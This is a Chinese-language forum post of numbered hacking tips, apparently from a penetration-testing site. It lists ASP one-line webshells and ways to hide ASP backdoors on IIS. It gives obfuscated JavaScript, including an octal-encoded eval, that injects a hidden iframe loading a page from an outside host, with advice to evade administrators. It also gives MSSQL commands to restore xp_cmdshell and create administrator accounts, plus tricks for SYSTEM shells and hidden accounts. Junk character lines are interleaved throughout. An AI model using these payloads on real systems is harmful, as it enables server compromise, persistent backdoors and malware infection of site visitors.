* P1 x- v w0 Y
3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!
# C0 }3 e5 \( w; J) _6 K; i: f
7 s: T( E! q& |& }" r. x
51、log备份时的一句话木马:
- o9 Z3 a8 o! t. j" _# W% a
a).<%%25Execute(request("go"))%%25>
. E( n" y% [1 X2 A( z$ l( ]
b).<%Execute(request("go"))%>
5 a4 F5 i4 m, e. R
c).%><%execute request("go")%><%
! K/ A; v) l$ o7 d6 A) N+ P
d).<script language=VBScript runat=server>execute request("sb")</Script>
0 G# @9 `6 x4 _5 i( h( F% y
e).<%25Execute(request("l"))%25>
C5 ?. c" Z' M9 q
f).<%if request("cmd")<>"" then execute request("pass")%>
4 t# x: U" Z$ k2 u+ n( H1 H
3 D( N( i/ `+ q+ f! D2 @
52、at "12:17" /interactive cmd
7 L0 H0 |) }/ B, A6 `9 v
执行后可以用AT命令查看新加的任务
; W. Z& M; c# I4 R7 X
用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。
" t/ l# b9 f* v5 h- f3 {+ N) w
2 f8 H m6 }9 @6 Q
53、隐藏ASP后门的两种方法
1 v* l l. z2 u
1、建立非标准目录:mkdir images..\
0 j0 E; ?- D k( R
拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
, q H* h$ b5 @1 e, _
通过web访问ASP木马:http://ip/images../news.asp?action=login
( Q9 i$ I- v% n
如何删除非标准目录:rmdir images..\ /s
1 [3 U: |9 b( R. J
2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:
" Q5 a# [& J! J; J8 M( b
mkdir programme.asp
3 m0 ?9 e1 [$ q6 V
新建1.txt文件内容:<!--#include file=”12.jpg”-->
7 |$ w! W: `: B7 C4 i
新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件
* T" c. ^" l( {) y! q
attrib +H +S programme.asp
% Y& M! r: s k6 c
通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt
! d0 E$ E3 }' b7 m! P" M
& b+ T' f( `! V6 L& y4 b' F
54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。
3 N" q- ^1 v& L- G) l/ P2 ]2 R
然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。
0 w3 }% r# ^, }+ b l s) F4 O
% W& d" Z' \6 T% ]
55、JS隐蔽挂马
9 Q1 m9 k2 \3 ^, k3 O3 R
1.
7 q! N6 ]% a% Y# v4 d
var tr4c3="<iframe src=ht";
$ V8 J; L7 D( ^& s+ `
tr4c3 = tr4c3+"tp:/";
" b, _2 g" J" S1 R2 c2 \. F
tr4c3 = tr4c3+"/ww";
1 L" C" m- O8 y2 Q- h" E- r+ I( R
tr4c3 = tr4c3+"w.tr4";
3 G7 \, m( r3 p; D+ b/ }
tr4c3 = tr4c3+"c3.com/inc/m";
* J7 J# O* C' l2 h
tr4c3 = tr4c3+"m.htm style="display:none"></i";
! Q1 V6 B$ O$ b. O
tr4c3 =tr4c3+"frame>'";
" h- G7 W4 Q9 T; K s% W
document.write(tr4c3);
0 m- ^0 S+ I n
避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。
" A p0 R" i; m/ W
! U7 x0 f& V) E# N* O% f& S+ k# b
2.
1 d/ E9 B4 r6 F( z3 e
转换进制,然后用EVAL执行。如
2 g9 u! o7 P6 p* D- s- z
eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");
l' ?- q. G! J6 f) }
不过这个有点显眼。
6 ?2 b' H! u! h# U, T
3.
/ Q2 r1 z- s! l# ?
document.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');
% M' Y* o: Z' p
最后一点,别忘了把文件的时间也修改下。
8 r/ J, P+ n4 q- K# a
, P' y2 T9 v5 F3 Q a
56.3389终端入侵常用DOS命令
1 {$ { v/ K7 O
taskkill taskkill /PID 1248 /t
) V) l' o, l4 L; o
& _" g) X8 A7 [
tasklist 查进程
# N" G. J: y0 ~0 F8 N
7 ] j6 w- B$ V: n+ v
cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限
# J4 @& E7 e- k: V
iisreset /reboot
& t0 z( d% i) N4 B4 |$ I* l' v) u
tsshutdn /reboot /delay:1 重起服务器
}2 x% V& q, y( j9 |3 k! @
1 U- r: B t, l9 m, A- u: [
logoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,
' S7 z( E3 W6 K: b; @
: m' q$ \6 X& T* @5 c
query user 查看当前终端用户在线情况
+ a7 E `. z |9 d
9 }+ H# {/ a+ k ~: c, z
要显示有关所有会话使用的进程的信息,请键入:query process *
, ~4 v! K0 q- H$ j, _5 f
( L" F$ b7 g9 J* z. ^; p! H
要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2
% x( ?; Q7 N% N4 Y7 d J
$ a" v3 l5 c8 q" @3 o
要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2
/ D( s0 L/ P: ]# G9 t& _5 y) X
9 [; ~4 y3 p8 G- F3 C
要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02
4 k U; F& e# U: x; E
! |7 G: o* l# g8 D H. {4 T, W K
命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启
. n7 ]% C7 e: L8 Q& K/ V) S# O
8 `3 [# }) V- X! G/ V, e3 T
命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统
* R+ u) p/ Z5 ]3 `
- @: u; l, x* c
命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。
; v( Y5 ]- A1 l/ ~# `5 x
+ g2 j. F6 S7 X( i# E9 [2 p
命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机
* d$ q5 l# h: \/ G8 u# k
0 |# ^9 k6 v2 L3 o1 X* H& }% W# o
56、在地址栏或按Ctrl+O,输入:
: }+ X1 j$ n5 P" @
javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;
1 X" ?/ G- |" p. E4 v4 J# \
, t( X0 a. n4 m) M: a, ~
源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。
- `) S. R) j* p
) g. F4 t5 t$ j1 y4 U4 B
57、net user的时候,是不能显示加$的用户,但是如果不处理的话,
! V- d1 @+ B, o' c" ]+ F
用net localgroup administrators是可以看到管理组下,加了$的用户的。
7 |4 T% E; N2 a- T
3 H. \* j3 y$ S% \7 E
58、 sa弱口令相关命令
9 R& `4 U) Z7 b( i0 n: e% o* ~
6 U q" h: e: G5 Q$ r
一.更改sa口令方法:
c# f2 h6 T, ` u% ?: p
用sql综合利用工具连接后,执行命令:
, W+ e( d' d/ x. U/ e: _
exec sp_password NULL,'20001001','sa'
/ D$ z+ W3 x% f, F7 c
(提示:慎用!)
$ c3 E: D, v9 N. ?$ `" w8 o8 O/ a, e" V
' u# z+ ~/ A+ P/ [: s5 w/ Y6 t3 ]
二.简单修补sa弱口令.
# B" E j$ L3 I
/ Q; X) \2 [1 C- J3 R5 ?; w! F$ b
方法1:查询分离器连接后执行:
0 e! h$ @, R0 m
if exists (select * from
6 \1 N' F: ^1 U) @. m( x
dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and
5 ^$ P$ W- `: ^
OBJECTPROPERTY(id, N'IsExtendedProc') = 1)
) N* ~1 g5 t) k/ T9 F* q" J5 V
# I& F" p% s e! P
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
& I+ X% @3 g9 a" y
D2 I7 Y. c; R2 z' ~
GO
: t6 n* q; S2 O) b
, c- a- F7 p ~' C; V( O
然后按F5键命令执行完毕
* j1 u1 D5 ~" s' t. j- S# b ~
, k+ ?" O/ i2 D& Q5 X" Q$ J* p
方法2:查询分离器连接后
* o3 r2 c: V5 E0 r% o, H1 k# p
第一步执行:use master
6 I8 @; L4 Z- O! V$ U6 D
第二步执行:sp_dropextendedproc 'xp_cmdshell'
5 o& Q* J. `6 e3 c! G- M) |5 \7 }
然后按F5键命令执行完毕
p* R% j9 m5 w& X
! }1 D' @! j" @
& U. a& l6 L. ?* ], D! m9 v
三.常见情况恢复执行xp_cmdshell.
& H8 E3 C2 {0 e+ T4 y/ b8 B6 D
, b: R7 c5 `3 A- r9 {
- B5 S$ V# [; {( `6 Z, j3 Z( U
1 未能找到存储过程'master..xpcmdshell'.
+ [. G) ~0 Z7 ]
恢复方法:查询分离器连接后,
. A+ x+ K/ a- E
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
" T! i& X8 P7 a, e; ^! I
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
, s7 ]6 V5 a! g M/ E. V2 [
然后按F5键命令执行完毕
6 y0 _; {1 A) h/ b f" d- I. C
9 r4 L5 p- c& M+ E7 w/ G
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
+ I% m" o8 O4 O* {- D
恢复方法:查询分离器连接后,
! H& B# h9 j T
第一步执行:sp_dropextendedproc "xp_cmdshell"
+ ]9 e S8 W* ]+ z
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
# c+ t( g& q% b9 L3 M2 J
然后按F5键命令执行完毕
/ y8 N7 e, Q' e) ^( X
2 J9 ~# Y# t& ?3 T; n
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
9 p8 k [# {6 d7 S4 E" J: c2 u
恢复方法:查询分离器连接后,
& m! |# u0 ^- L( R; `/ p, h) ]- ]+ m, }
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
! L' f6 U( B3 |& Y( {" W
第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
0 T( y' {2 x# N
然后按F5键命令执行完毕
) k2 [% D$ D$ s; r% d9 R) F$ h
2 M/ c7 L4 `3 Y( l5 U
四.终极方法.
% C2 T$ d0 a) B$ _2 t
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
, i4 s( m4 m+ v7 t( [; m
查询分离器连接后,
+ T, P5 b5 m# K0 d# P9 g
2000servser系统:
" B( C4 l5 A Q' l) N% E
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'
) {) \/ P9 F8 U+ \8 I! L8 p
5 d% C* b& g- l9 N
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'
5 ?% U; @) d! S: e4 c, J3 O
! Y8 A, z. k/ |9 f. Z' f
xp或2003server系统:
" c8 j1 i8 U& m% Q& l: @" v
" A" Q. _! K9 F+ G
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'
+ `0 E+ E+ C) A) @5 q7 _3 x& _
8 G7 v. n6 |+ |; e& y
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'
9 s/ }: J$ e n4 _
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2